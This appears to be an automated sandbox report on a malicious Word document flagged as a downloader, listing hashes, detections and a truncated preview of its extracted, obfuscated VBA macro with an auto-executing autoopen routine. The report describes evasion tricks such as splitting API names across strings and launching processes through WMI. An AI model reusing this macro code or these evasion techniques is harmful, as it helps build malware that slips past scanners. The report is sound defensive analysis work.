Office (OLE) malware analysis — malicious · 11a908624ce8e6ba

MALICIOUS

Office (OLE)

199.4 KB Created: 2019-04-30 09:31:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: a05a3ec334208de0e7ad7daf3606750b SHA-1: dd7ed3716bb3fd45bcf921c92234be20e8ef985e SHA-256: 11a908624ce8e6ba42e13acb2a20006353f112005a54c3d5ff516c2d75a76d97

302 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an autoopen subroutine. The macro utilizes obfuscation techniques, including splitting keywords like 'winmgmts', and employs WMI to launch processes, indicating a downloader or dropper functionality. The presence of legacy WordBasic markers and GetObject calls further supports its malicious nature.

Heuristics 8

ClamAV: Doc.Downloader.00536d-6958656-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6958656-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 39188 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	39188 bytes
SHA-256: `142f25c971f3b3d875ae71f29bc79d24a3194ef558b2e11ab556f0154417d2a3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "sCUxAAAA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "lG4cwD" Attribute VB_Base = "0{EBC644D4-E386-413C-908E-8481485EB75E}{EC580E15-8A81-4B78-88AB-84AAC279D031}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "TUUBC1A" Attribute VB_Base = "0{3167F5AA-0D09-48E8-85A9-2ACA6C93CB70}{EEF0353F-884E-4D91-BC63-4F5627EB9542}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "MxwAUDA" Sub autoopen() If HU41ADUZ = L4AZXAUU Then ElseIf tCUAcc4C = RAAUUAQ Then PBQUB_UZ = Hex(JADBBxwx + CSng(C_AGUA / Tan(970737797 + 556162569))) ElseIf nCAoxXDQ = dZADAAAU Then ZAAcAAAk = Atn(679437309) + Int(131615049) ElseIf zAkwUXQA = tBABAAA Then ODo1AZ = 448721800 + Atn(136639462) End If If GXAAADA_ = kAcAAQ Then ElseIf hXAxZAA = iC1cDU Then DAQBAQ = Hex(XCZA1Q + CSng(HxAQDU_ / Tan(462506023 + 246436896))) ElseIf a4w44o4 = bAZA4oAZ Then pkAABDG = Atn(326522074) + Int(129585114) ElseIf D4AXAQw = NUA4oDZ4 Then hcA4XA = 883858803 + Atn(693918168) End If jQAAxZ_ If FQBXU_U = UZUo1BAA Then ElseIf bAoQXAB = JAAx1G Then rCACwUBA = Hex(MD1xBBA + CSng(KAUDBAD / Tan(289954362 + 68963466))) ElseIf UXoAAUA = iADcA4 Then IDwQAX = Atn(192828462) + Int(178883383) ElseIf I4kDQBU = XGwXAQ Then HUUAcBDk = 722919832 + Atn(361484891) End If If EAGG1A1 = iwxAD_ Then ElseIf BQBQQD = vUAQAA_A Then VDQ4kA = Hex(jABoAc + CSng(JQwUBB_ / Tan(747333040 + 376130019))) ElseIf PABA4AA = iAGUUDU Then CcADAB = Atn(691073589) + Int(205421895) ElseIf t4AwQBD = twkUAwAA Then OXAAGA4 = 820586426 + Atn(212776036) End If End Sub Function KwDCUk(JUAAAAAA) If YAGAXU = woAAAD Then ElseIf PBDBXkA = fAZ1A1k Then NwBwACZC = Hex(oGXoAAk + CSng(rDDUDBB / Tan(648705149 + 949573156))) ElseIf iAC1BAQD = DAZDQAA Then zADQCAA = Atn(495369129) + Int(231476101) ElseIf PBDAQB = CAQxXCQA Then qxAQDoQ = 217618812 + Atn(159211596) End If If X41CAAc = jAAUZx Then ElseIf rQAUAQ = OQDCUwxo Then KcGB4A = Hex(PDxAQ1A + CSng(TocxD_ / Tan(169904674 + 341042040))) ElseIf UZAAQQ1 = iAADQxw_ Then zAADXA = Atn(9222619) + Int(949679386) ElseIf aQwDQw = P_1wZcAQ Then JxBxUkwQ = 361956331 + Atn(147205240) End If Set KwDCUk = CVar(JUAAAAAA) If DDAZAcBB = LxcxxAQ Then ElseIf HoAx_Qxc = J_xAA_4Z Then MU4XAQCw = Hex(zC_Q4o + CSng(ocAcoA / Tan(555200342 + 907486524))) ElseIf rQUA4A = OAUCBAAZ Then A_k11B = Atn(710272978) + Int(195646544) ElseIf aUAUAA = pXDAAB Then RBU4ADA = 332618772 + Atn(894355665) End If If PAADAC = cA1Q1A_ Then ElseIf ZAGAxAAB = vGxQwA Then Vw_GAQZ = Hex(fGQAAoAA + CSng(z1AAQw / Tan(863611492 + 19546555))) ElseIf JDxGAAD = JAADAGAA Then pQU44A = Atn(334802405) + Int(489768733) ElseIf XoQQkUQG = jZcxAAAA Then SDABAQ__ = 418002456 + Atn(23872221) End If If HQCBXko1 = VAU4Xx Then ElseIf GUUQAB = LU_AAw1 Then sU1CkBA = Hex(UBAxAA1 + CSng(SxDADwB / Tan(903309971 + 473274309))) ElseIf FXCxxAA = zoAcAX Then K4AA1ACD = Atn(210664378) + Int(814378656) ElseIf TwDc__ = ux_AB4Z Then ToXAoU = 876606067 + Atn(79912719) End If End Function Attribute VB_Name = "MBAU__A" Function jQAAxZ_() On Error Resume Next If CAABAAoX = jBXGABBZ Then ElseIf AQ4AGAcD = ZXZAAx Then vZ4AG ... (truncated)

SHA-256: 142f25c971f3b3d875ae71f29bc79d24a3194ef558b2e11ab556f0154417d2a3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "sCUxAAAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lG4cwD"
Attribute VB_Base = "0{EBC644D4-E386-413C-908E-8481485EB75E}{EC580E15-8A81-4B78-88AB-84AAC279D031}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "TUUBC1A"
Attribute VB_Base = "0{3167F5AA-0D09-48E8-85A9-2ACA6C93CB70}{EEF0353F-884E-4D91-BC63-4F5627EB9542}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MxwAUDA"
Sub autoopen()
   If HU41ADUZ = L4AZXAUU Then
ElseIf tCUAcc4C = RAAUUAQ Then
            PBQUB_UZ = Hex(JADBBxwx + CSng(C_AGUA / Tan(970737797 + 556162569)))
ElseIf nCAoxXDQ = dZADAAAU Then
            ZAAcAAAk = Atn(679437309) + Int(131615049)
ElseIf zAkwUXQA = tBABAAA Then
            ODo1AZ = 448721800 + Atn(136639462)
End If
   If GXAAADA_ = kAcAAQ Then
ElseIf hXAxZAA = iC1cDU Then
            DAQBAQ = Hex(XCZA1Q + CSng(HxAQDU_ / Tan(462506023 + 246436896)))
ElseIf a4w44o4 = bAZA4oAZ Then
            pkAABDG = Atn(326522074) + Int(129585114)
ElseIf D4AXAQw = NUA4oDZ4 Then
            hcA4XA = 883858803 + Atn(693918168)
End If
jQAAxZ_
   If FQBXU_U = UZUo1BAA Then
ElseIf bAoQXAB = JAAx1G Then
            rCACwUBA = Hex(MD1xBBA + CSng(KAUDBAD / Tan(289954362 + 68963466)))
ElseIf UXoAAUA = iADcA4 Then
            IDwQAX = Atn(192828462) + Int(178883383)
ElseIf I4kDQBU = XGwXAQ Then
            HUUAcBDk = 722919832 + Atn(361484891)
End If
   If EAGG1A1 = iwxAD_ Then
ElseIf BQBQQD = vUAQAA_A Then
            VDQ4kA = Hex(jABoAc + CSng(JQwUBB_ / Tan(747333040 + 376130019)))
ElseIf PABA4AA = iAGUUDU Then
            CcADAB = Atn(691073589) + Int(205421895)
ElseIf t4AwQBD = twkUAwAA Then
            OXAAGA4 = 820586426 + Atn(212776036)
End If
End Sub
Function KwDCUk(JUAAAAAA)
   If YAGAXU = woAAAD Then
ElseIf PBDBXkA = fAZ1A1k Then
            NwBwACZC = Hex(oGXoAAk + CSng(rDDUDBB / Tan(648705149 + 949573156)))
ElseIf iAC1BAQD = DAZDQAA Then
            zADQCAA = Atn(495369129) + Int(231476101)
ElseIf PBDAQB = CAQxXCQA Then
            qxAQDoQ = 217618812 + Atn(159211596)
End If
   If X41CAAc = jAAUZx Then
ElseIf rQAUAQ = OQDCUwxo Then
            KcGB4A = Hex(PDxAQ1A + CSng(TocxD_ / Tan(169904674 + 341042040)))
ElseIf UZAAQQ1 = iAADQxw_ Then
            zAADXA = Atn(9222619) + Int(949679386)
ElseIf aQwDQw = P_1wZcAQ Then
            JxBxUkwQ = 361956331 + Atn(147205240)
End If
Set KwDCUk = CVar(JUAAAAAA)
   If DDAZAcBB = LxcxxAQ Then
ElseIf HoAx_Qxc = J_xAA_4Z Then
            MU4XAQCw = Hex(zC_Q4o + CSng(ocAcoA / Tan(555200342 + 907486524)))
ElseIf rQUA4A = OAUCBAAZ Then
            A_k11B = Atn(710272978) + Int(195646544)
ElseIf aUAUAA = pXDAAB Then
            RBU4ADA = 332618772 + Atn(894355665)
End If
   If PAADAC = cA1Q1A_ Then
ElseIf ZAGAxAAB = vGxQwA Then
            Vw_GAQZ = Hex(fGQAAoAA + CSng(z1AAQw / Tan(863611492 + 19546555)))
ElseIf JDxGAAD = JAADAGAA Then
            pQU44A = Atn(334802405) + Int(489768733)
ElseIf XoQQkUQG = jZcxAAAA Then
            SDABAQ__ = 418002456 + Atn(23872221)
End If
   If HQCBXko1 = VAU4Xx Then
ElseIf GUUQAB = LU_AAw1 Then
            sU1CkBA = Hex(UBAxAA1 + CSng(SxDADwB / Tan(903309971 + 473274309)))
ElseIf FXCxxAA = zoAcAX Then
            K4AA1ACD = Atn(210664378) + Int(814378656)
ElseIf TwDc__ = ux_AB4Z Then
            ToXAoU = 876606067 + Atn(79912719)
End If
End Function

Attribute VB_Name = "MBAU__A"
Function jQAAxZ_()
On Error Resume Next
   If CAABAAoX = jBXGABBZ Then
ElseIf AQ4AGAcD = ZXZAAx Then
            vZ4AG
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.